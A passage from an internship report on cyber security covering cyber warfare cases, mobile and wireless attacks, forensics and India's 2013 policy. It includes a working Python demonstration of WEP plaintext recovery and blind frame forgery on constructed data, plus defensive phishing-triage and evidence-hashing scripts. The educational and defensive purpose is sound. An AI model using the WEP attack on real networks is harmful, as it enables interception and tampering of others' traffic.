civilians, military and security personnel, or research bodies from reaching sensitive websites.

4. Electrical Power Grid

Attacking the power grid lets attackers disable critical systems, disrupt infrastructure, and potentially
cause bodily harm. Because telephone and mobile networks depend on mains power, an attack on the grid can
also take down communications such as calls and text messages.

5. Propaganda Attacks

These are attempts to influence the minds of people living in or fighting for a target country. Propaganda
can be used to expose embarrassing truths, or to spread lies so that people lose trust in their country or
side with its enemies.

6. Economic Disruption

Most modern economic systems operate using computers. Attackers can target computer networks of
economic establishments such as stock markets, payment systems, and banks to steal money or block people
from accessing the funds they need.

7. Surprise Attacks

These are the cyber equivalent of surprise attacks such as Pearl Harbor or 9/11: a massive attack the enemy
is not expecting, mounted to weaken its defenses. This can be done to prepare the ground for a physical
attack in the context of hybrid warfare.


3.4.2 Examples of Cyber Warfare Operations


Here are several well-publicized examples of cyber warfare in recent times.

1. Stuxnet

Stuxnet was a worm, discovered in 2010, that attacked the Iranian nuclear program and is among the most
sophisticated cyber-attacks in history. It spread via infected USB devices and targeted supervisory control
and data acquisition (SCADA) systems, specifically the Siemens programmable logic controllers driving the
uranium-enrichment centrifuges at Natanz, which it damaged by altering their rotational speed while feeding
normal readings back to the operators. According to most reports, the attack seriously set back Iran's
enrichment capability.

2. Sony Pictures Hack

The 2014 attack on Sony Pictures followed the release of the film "The Interview", which presented a negative
portrayal of Kim Jong Un. The attack is attributed to North Korean government hackers: the FBI found
similarities to previous malware attacks attributed to North Korea, including code, encryption algorithms,
and data deletion mechanisms.

3. Bronze Soldier

In 2007, Estonia relocated the Bronze Soldier, a Soviet-era war memorial, from the center of its capital
Tallinn to a military cemetery on the city's outskirts. In the following weeks Estonia suffered a wave of
significant cyber-attacks: government websites, media outlets, and banks were overloaded with traffic in
massive distributed denial of service (DDoS) attacks and consequently were taken offline.

4. Fancy Bear

CrowdStrike reported that the Russian state-sponsored group Fancy Bear (APT28), which it links to Russian
military intelligence, targeted Ukrainian rocket forces and artillery between 2014 and 2016. The malware
was distributed through a trojanized Android application that D-30 howitzer units used to compute targeting
data.

Ukrainian officers made wide use of the app, which carried a variant of the X-Agent implant. CrowdStrike
initially claimed the operation contributed to the loss of over 80% of Ukraine's D-30 howitzers; that figure
was disputed by the Ukrainian military and later revised downward by CrowdStrike, so the campaign is better
cited as an example of targeting than of confirmed battlefield effect.


5. Enemies of Qatar

Elliott Broidy, an American Republican fundraiser, sued the government of Qatar in 2018, accusing it of
stealing and leaking his emails to discredit him. According to the lawsuit, the brother of the Qatari Emir,
along with others in the Qatari leadership, orchestrated a cyber warfare campaign in which 1,200 people were
targeted by the same attackers, many of them known "enemies of Qatar", including senior officials from Egypt,
Saudi Arabia, the United Arab Emirates, and Bahrain.

3.5 Cyber Crime: Mobile and Wireless Devices

The main types of wireless and mobile device attacks are:

3.5.1 Smishing

Smishing has become common as smartphones are widely used. It uses the Short Message Service (SMS) to
deliver fraudulent text messages, typically containing a link or a phone number to call. Victims who respond
may give up sensitive information such as credit card or account details, and opening the linked website may
silently download malware that infects the device.


3.5.2 Wardriving

War driving is the practice of driving around with a Wi-Fi-capable device (usually with GPS) to discover and
map wireless access points wherever they can be found: their network names, hardware addresses, encryption
type and location. Because many networks are open or weakly secured, an attacker can collect a very large
amount of information in a very short time and return later to the targets that look easiest.

3.5.3 War chalking

War chalking is the drawing of symbols in public places to advertise the presence and characteristics of a
nearby Wi-Fi network, for example whether it is open or closed, so that others can find and use it.


3.5.4 Vishing Attack

Vishing is short for voice phishing: defrauding people over the phone by enticing them to divulge sensitive
information. The attacker uses the victim's data for their own benefit, typically financial gain, and often
spoofs the caller ID or impersonates a bank or government office to appear legitimate.

3.5.5 WEP Attack

Wired Equivalent Privacy (WEP) is the original 802.11 security protocol. It attempts to give a wireless local
area network the same level of confidentiality that physical access control gives a wired LAN by encrypting
frames with RC4 under a shared 40- or 104-bit key. Its design is broken: each frame is keyed by the shared
key plus a 24-bit initialization vector (IV) sent in the clear, so IVs repeat after a few thousand frames and
the reused keystream exposes plaintext; its CRC-32 integrity check is linear, so an attacker can alter an
encrypted frame and fix the check value without the key; and statistical attacks on the RC4 key schedule
(Fluhrer, Mantin and Shamir, 2001, and later refinements) recover the key itself from captured traffic in
minutes. WEP was deprecated in 2004, and any network still using it should be moved to WPA2 or WPA3.
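As an added example (not code from the original report or from any standard), the Python script below shows two of the WEP weaknesses described above in working form. It implements RC4 and a simplified WEP frame (a three-byte IV in the clear followed by RC4-encrypted payload and CRC-32 ICV), then (a) recovers a frame's plaintext from a second frame that reuses the same IV, using only a known plaintext and no key, and (b) changes "bob" to "eve" inside an encrypted frame and repairs the ICV blind. The key, IV and frame contents are constructed values; the little-endian ICV byte order is a simplification chosen for the demo.

```python
import math
import zlib


def rc4(key: bytes, length: int) -> bytes:
    """RC4 keystream (key-scheduling then PRGA); WEP seeds it with IV || key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(payload: bytes) -> bytes:
    """WEP integrity check value: plain CRC-32 (byte order is a choice of this demo)."""
    return zlib.crc32(payload).to_bytes(4, "little")


def wep_encrypt(key: bytes, iv: bytes, payload: bytes) -> bytes:
    """Frame body = IV (3 bytes, in clear) || RC4(IV||key) XOR (payload || ICV)."""
    plain = payload + icv(payload)
    return iv + xor(plain, rc4(iv + key, len(plain)))


def wep_decrypt(key: bytes, frame: bytes):
    """Return (payload, icv_ok) for a frame body produced by wep_encrypt."""
    iv, body = frame[:3], frame[3:]
    plain = xor(body, rc4(iv + key, len(body)))
    payload, tag = plain[:-4], plain[-4:]
    return payload, tag == icv(payload)


def frames_until_iv_collision(iv_bits: int = 24, probability: float = 0.5) -> float:
    """Birthday bound: frames a passive sniffer expects before two of them share an IV."""
    return math.sqrt(2 * (2 ** iv_bits) * math.log(1 / (1 - probability)))


def recover_via_iv_reuse(frame_known: bytes, known_payload: bytes, frame_target: bytes) -> bytes:
    """Same IV => same keystream, so C1 XOR C2 = P1 XOR P2; a known P1 reveals P2 without the key."""
    if frame_known[:3] != frame_target[:3]:
        raise ValueError("frames do not share an IV")
    known_plain = known_payload + icv(known_payload)
    n = min(len(frame_known), len(frame_target)) - 3
    p1_xor_p2 = xor(frame_known[3:3 + n], frame_target[3:3 + n])
    return xor(p1_xor_p2, known_plain[:n])  # target payload (and ICV, if fully covered)


def forge_without_key(frame: bytes, offset: int, old: bytes, new: bytes) -> bytes:
    """Replace known bytes at offset. CRC-32 is affine over XOR for fixed length:
    crc(P XOR D) = crc(P) XOR crc(D) XOR crc(0...0), so the encrypted ICV can be fixed blind."""
    iv, body = frame[:3], frame[3:]
    n = len(body) - 4
    delta = bytearray(n)
    delta[offset:offset + len(old)] = xor(old, new)
    icv_delta = (zlib.crc32(bytes(delta)) ^ zlib.crc32(bytes(n))).to_bytes(4, "little")
    return iv + xor(body[:n], delta) + xor(body[n:], icv_delta)


# Constructed demo values: a 40-bit key and two frames an access point might carry.
KEY = bytes.fromhex("0102030405")
IV = bytes.fromhex("0a0b0c")
P1 = b"GET /index.html HTTP/1.0\r\nHost: intranet\r\n"  # assume the attacker knows this one
P2 = b"POST /login user=bob&pw=hunter2"                # this one is the target


def demo():
    f1 = wep_encrypt(KEY, IV, P1)
    f2 = wep_encrypt(KEY, IV, P2)  # same IV: the 24-bit IV space forces this within hours
    recovered = recover_via_iv_reuse(f1, P1, f2)[:len(P2)]
    forged = forge_without_key(f2, P2.index(b"bob"), b"bob", b"eve")
    forged_payload, forged_ok = wep_decrypt(KEY, forged)
    return recovered, forged_payload, forged_ok


if __name__ == "__main__":
    rec, fp, ok = demo()
    print("recovered :", rec)
    print("forged    :", fp, "ICV valid:", ok)
    print("frames for 50%% IV collision: %.0f" % frames_until_iv_collision())
```

The key-recovery attack (FMS and its successors) is not reproduced here; the two properties shown are enough to read and rewrite traffic on a WEP network without ever learning the key, which is why the protocol cannot be patched and must be replaced.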

3.5.6 Phishing

Phishing is when attackers trick users into doing the wrong thing, such as clicking a malicious link that
downloads malware, visiting a fraudulent website, or entering their credentials into a fake login page.
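The following triage script is an added worked example, not part of the internship material, covering the smishing (3.5.1) and phishing (3.5.6) lures described above. It scores a set of constructed SMS bodies with the heuristics an analyst would check first: URL shorteners, raw IP-address hosts, look-alike brand domains (digit-for-letter substitutions, one-character typos, brand names buried in a subdomain), plain-HTTP credential pages and urgency wording. The message texts, the allow-list TRUSTED_DOMAINS, the word lists and the threshold are assumptions for the demonstration.

```python
import re
from urllib.parse import urlsplit

# Constructed sample SMS bodies for the demo (not real traffic); hosts and brands are illustrative.
SAMPLE_MESSAGES = [
    "Your parcel is held at customs. Pay the fee now: http://bit.ly/3xYzAbc",
    "URGENT: your account is suspended. Verify at http://paypa1-secure.com/login",
    "Bank alert: confirm your card at http://192.168.10.5/verify",
    "Hi, the match starts at 7, see you at https://www.example.org/events",
]

# Assumed allow-list of the brands this organization protects (hypothetical for the demo).
TRUSTED_DOMAINS = {"paypal.com", "example.org"}
SHORTENERS = {"bit.ly", "tinyurl.com", "t.co", "goo.gl", "is.gd"}
URGENCY_WORDS = ("urgent", "suspended", "immediately", "pay the fee", "verify", "confirm")
CREDENTIAL_PATHS = ("login", "verify", "account", "signin")
URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t", "@": "a", "$": "s"})


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to catch one-character brand typos such as paypai."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registered_domain(host: str) -> str:
    """Last two labels; a real deployment would consult the public-suffix list instead."""
    return ".".join(host.lower().split(".")[-2:])


def lookalike_brand(host: str):
    """Return the trusted domain this host imitates, or None if it is the real thing or unrelated."""
    if registered_domain(host) in TRUSTED_DOMAINS:
        return None
    labels = host.lower().translate(HOMOGLYPHS).replace("-", ".").split(".")
    for trusted in TRUSTED_DOMAINS:
        brand = trusted.split(".")[0]
        if any(label == brand or levenshtein(label, brand) == 1 for label in labels):
            return trusted
    return None


def score_message(text: str):
    """Return (score, reasons) for one SMS body; each matched heuristic adds one point."""
    reasons = []
    lowered = text.lower()
    for url in URL_RE.findall(text):
        parts = urlsplit(url)
        host = parts.hostname or ""
        path = parts.path.lower()
        if IPV4_RE.match(host):
            reasons.append(f"ip-address-host:{host}")
        if registered_domain(host) in SHORTENERS:
            reasons.append(f"url-shortener:{host}")
        brand = lookalike_brand(host)
        if brand:
            reasons.append(f"lookalike-domain:{host}~{brand}")
        if url.lower().startswith("http://") and any(w in path for w in CREDENTIAL_PATHS):
            reasons.append(f"plaintext-credential-page:{path}")
    hits = [w for w in URGENCY_WORDS if w in lowered]
    if hits:
        reasons.append("urgency:" + ",".join(hits))
    return len(reasons), reasons


def triage(messages, threshold: int = 2):
    """Messages worth a human look: score >= threshold, highest first."""
    scored = [(score_message(m), m) for m in messages]
    return sorted(((s, m) for (s, _), m in scored if s >= threshold), reverse=True)


if __name__ == "__main__":
    for score, message in triage(SAMPLE_MESSAGES):
        print(score, message)
        print("   ", score_message(message)[1])
```

Heuristics like these are a first filter, not a verdict: a legitimate courier may use a shortener and a phishing kit may sit on a clean-looking domain, so the output is meant to prioritise messages for analyst review or URL detonation rather than to block on its own.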


4. CYBER FORENSICS

Cyber forensics is the process of identifying, preserving, extracting and analyzing data from electronic
devices as proof of a crime, following proper investigation rules so that the evidence can be presented to
the court and the culprit brought to justice.

1. The surge of technological advances has challenged the traditional ways of collecting and generating
evidence. The intangible nature of digital evidence, coupled with the fragile and vulnerable structure of
the internet, poses inherent obstacles to collecting and preserving it.

The dearth of adequate techno-legal skills, coupled with a lack of expertise in collecting such evidence,
has made cyber-crimes harder to investigate and prosecute even as they continue to rise in the nation.

2. The form in which evidence is preserved also matters: the admissibility of the storage devices carrying
the media content from the crime scene is an important factor to consider. Reading Section 3 and Section 65B
of the Indian Evidence Act, 1872 together, it can be inferred that certain computer outputs of the original
electronic record are now admissible as evidence "without proof or production of the original record".

Thus the material on computer printouts, floppy disks and CDs becomes admissible as evidence.

3. The other crucial question in cybercrime investigation, the reliability of digital evidence, is addressed
by Section 79A of the Information Technology Act, 2000 (inserted by the 2008 amendment), which empowers the
Central Government to notify any department or agency of the Central or a State Government as an Examiner of
Electronic Evidence.
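As an added illustration (not part of the original report and not a CBI or CFL procedure), the Python script below shows the integrity side of preserving digital evidence discussed above: an acquired image is hashed in chunks, the hashes are recorded in a manifest, and each chain-of-custody entry is linked to the previous one by hash, so that both a modified copy of the image and a back-dated edit to the custody log are detected. The image bytes, case identifiers, examiner names and timestamps are constructed for the demonstration.

```python
import hashlib
import io
import json
from datetime import datetime, timezone

# MD5 is kept beside SHA-256 because older tools and court reports still quote it.
HASH_ALGORITHMS = ("md5", "sha256")


def digest_stream(stream, chunk_size=1 << 20):
    """Hash an evidence image in chunks so a multi-gigabyte file never sits in memory at once."""
    hashers = {name: hashlib.new(name) for name in HASH_ALGORITHMS}
    for block in iter(lambda: stream.read(chunk_size), b""):
        for h in hashers.values():
            h.update(block)
    return {name: h.hexdigest() for name, h in hashers.items()}


def _entry_hash(entry):
    """Hash of a custody entry over its canonical JSON form (sorted keys, no whitespace)."""
    canonical = json.dumps(entry, sort_keys=True, separators=(",", ":")).encode()
    return hashlib.sha256(canonical).hexdigest()


def append_custody(manifest, actor, action, when=None):
    """Append a chain-of-custody entry that commits to the previous entry's hash."""
    log = manifest["custody"]
    entry = {
        "seq": len(log),
        "time": when or datetime.now(timezone.utc).isoformat(),
        "actor": actor,
        "action": action,
        "prev_hash": log[-1]["entry_hash"] if log else "0" * 64,
    }
    entry["entry_hash"] = _entry_hash(entry)
    log.append(entry)
    return entry


def acquire(case_id, item_id, stream, actor, when=None):
    """Create the manifest for a seized item: its hashes plus the first custody entry."""
    manifest = {"case_id": case_id, "item_id": item_id,
                "hashes": digest_stream(stream), "custody": []}
    append_custody(manifest, actor, "acquired and hashed", when)
    return manifest


def verify_image(manifest, stream):
    """True if the copy being examined still matches the hashes taken at acquisition."""
    return digest_stream(stream) == manifest["hashes"]


def verify_custody(manifest):
    """Recompute the hash chain; any edited, reordered or removed entry breaks it."""
    expected_prev = "0" * 64
    for seq, entry in enumerate(manifest["custody"]):
        body = {k: v for k, v in entry.items() if k != "entry_hash"}
        if (entry["seq"] != seq or body["prev_hash"] != expected_prev
                or _entry_hash(body) != entry["entry_hash"]):
            return False
        expected_prev = entry["entry_hash"]
    return True


# Constructed stand-in for a disk image; a real case would hash the acquired .dd or .E01 file.
IMAGE = (b"FAT32 partition, constructed for the demo: " * 2048) + b"user@example.test wrote: meet at 9"


def demo():
    manifest = acquire("CASE-0001", "ITEM-01-laptop-ssd", io.BytesIO(IMAGE),
                       "examiner A", "2022-03-01T10:00:00+00:00")
    append_custody(manifest, "examiner A", "sealed in evidence bag", "2022-03-01T10:05:00+00:00")
    append_custody(manifest, "examiner B", "received for analysis", "2022-03-02T09:00:00+00:00")
    tampered = IMAGE[:-1] + b"8"  # one byte changed: "meet at 9" becomes "meet at 8"
    results = {
        "original_matches": verify_image(manifest, io.BytesIO(IMAGE)),
        "tampered_matches": verify_image(manifest, io.BytesIO(tampered)),
        "custody_intact": verify_custody(manifest),
    }
    manifest["custody"][1]["actor"] = "someone else"  # a later edit to the log
    results["custody_after_edit"] = verify_custody(manifest)
    return results


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The hash chain only exposes changes made without recomputing every later entry; to carry evidentiary weight the manifest should also be signed by the examiner or lodged with an independent party, and the recorded hash values are what the examiner quotes when certifying that the copy analyzed is faithful to the seized original.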

4.1 Cyber Crime Investigation by CBI

The CBI can also be approached for any serious economic offence that is not of a general and routine
nature. It has an Economic Offences Division for investigating major financial scams and serious economic
frauds, including crimes relating to fake Indian currency notes, bank frauds and cyber-crimes.


For combating such crimes, the CBI has certain specialized structures, namely the Cyber Crimes Research and
Development Unit (CCRDU), the Cyber Crime Investigation Cell (CCIC), the Cyber Forensics Laboratory (CFL),
and the Network Monitoring Centre.

The CCRDU is mainly entrusted with collecting information on reported cyber-crime cases for further
investigation in liaison with the State Police Forces. More broadly, it plays a pivotal role in the
collection and dissemination of information on cyber-crimes together with the Ministry of IT, Government of
India, other organizations and institutions, and Interpol Headquarters.

The CCIC has the power to investigate the criminal offences under the Information Technology Act, 2000 as
amended in 2008, and is also the point of contact for Interpol for reporting cyber-crimes in India.

The third organ, i.e., CFL, is the one which provides consultations and conducts criminal investigation for
various law enforcement agencies. It not only provides on-site assistance for computer search and seizure
upon request, but also is the one which provides expert testimony in the court of law.

It is pertinent to note that the CFL must also adhere to all legal formalities during the seizure of the
media for the media analysis to be admissible. Given the possibility of remote access from an isolated
location anywhere in the world, storage of the data in another jurisdiction cannot be ruled out altogether.

Where the data is stored in another country, Interpol ought to be informed and Section 166 of the Code of
Criminal Procedure (CrPC) needs to be complied with. The Network Monitoring Centre is entrusted with
monitoring the Internet using various tools.

Recently, CBI has signed a memorandum of understanding (MoU) with Data Security Council of India
(DSCI) with a view to seek expert services from the latter in managing the new challenges in cybercrimes
and updating officials with the latest technology. This shows a novel collaborative approach between the law
enforcement agencies and IT Industry for strengthening the security measures.

4.2 National Cyber Security Policy

The National Cyber Security Policy, 2013 is a policy framework issued by the Department of Electronics and
Information Technology (DeitY). It aims to protect public and private infrastructure from cyber-attacks, and
also intends to safeguard "information, such as personal information (of web users), financial and banking
information and sovereign data".

The Ministry of Communications and Information Technology (India) defines cyberspace as a complex
environment consisting of interactions between people, software and services, supported by the worldwide
distribution of information and communication technology devices and networks.


4.2.1 Need for a cyber security policy


Before 2013, India did not have a cyber security policy. The need for one was felt during the NSA
surveillance revelations that surfaced in 2013. Information empowers people, and a distinction must be drawn
between information that can flow freely between systems and information that needs to be secured: personal
information, banking and financial details, and security information which, if it reaches the wrong hands,
can put the country's safety in jeopardy.

This Policy has been drafted in consultation with all the stakeholders. In order to digitize the economy and
promote more digital transactions, the government must be able to generate trust in people in the
Information and Communications Technology systems that govern financial transactions. A strong
integrated and coherent policy on cyber security is also needed to curb the menace of cyber terrorism.


4.3 National Cyber Security Policy Vision


To build secure and resilient cyberspace for citizens, businesses and Government, National Cyber Security
Policy Objectives are:

1. Encouraging the adoption of IT in all sectors of the economy by creating adequate trust in IT systems by
the creation of a secure cyber ecosystem.

2. Creating an assurance framework for the design of security policies and for the promotion and enabling
actions for compliance with global security standards and best practices through conformity assessment.

3. Bolstering the regulatory framework for ensuring a secure cyberspace ecosystem.

4. Enhancing and developing national and sectoral level 24 x 7 mechanisms for obtaining strategic
information concerning threats to ICT infrastructure, creating scenarios for response, resolution and crisis
management through effective predictive, preventive, protective, response and recovery actions.

5. Operating a 24×7 National Critical Information Infrastructure Protection Centre (NCIIPC) to improve the
protection and resilience of the country's critical information infrastructure.

6. Developing suitable indigenous security technologies to address requirements in this field.

7. Improving the visibility of the ICT (Information and Communication Technology) products/services’
integrity by having testing and validation infrastructure.

8. Creating a workforce of 500,000 professionals skilled in cybersecurity in the next 5 years.

9. Providing businesses with fiscal benefits for adopting standard security practices and processes.

10. Safeguarding the privacy of citizen’s data and reducing economic losses due to cybercrime or data theft.

11. Enabling effective prevention, investigation and prosecution of cybercrime and enhancement of law
enforcement capabilities through legislative intervention.

12. Developing a culture of cyber security and privacy.

13. Developing effective public-private partnerships and collaborative engagements by means of technical
and operational cooperation. Promoting global cooperation by encouraging shared understanding and
leveraging relationships for furthering the cause of security of cyberspace.


CONCLUSION
From this report, it is concluded that the internship “Cyber Security by Palo Alto Networks” has
provided us with an immense knowledge on different aspects of cyber security in a simple and
understandable way.

Cyber security is one of the most important aspects of the fast-paced growing digital world and this
internship helped us to understand these emerging technologies. The Internship covered the topics like:

1. Introduction to Cyber Security

2. Fundamentals of Networks Security

3. Fundamentals of Cloud Security

4. Fundamentals of SOC (Security Operations Center)

These fundamental courses cover all the basic information and create awareness in the students
regarding security issues. The different cyber-attacks and crimes were broadly discussed and the necessary
steps to avoid such attacks and crimes were mentioned in an easy way.

New emerging technologies like Cloud Computing, Network Security, and Security operations were
discussed briefly with pictorial representations which helped the students to understand and analyze them.
The purpose of the internship is to help students pursue a career in cybersecurity, as there are not enough
professionals in the field at present.

Palo Alto Networks Cyber Security Virtual Internship 2021 helped students to understand and
analyze the latest technologies in the Cyber Security sector and it enhances the knowledge of a student on
the Cyber Security world.



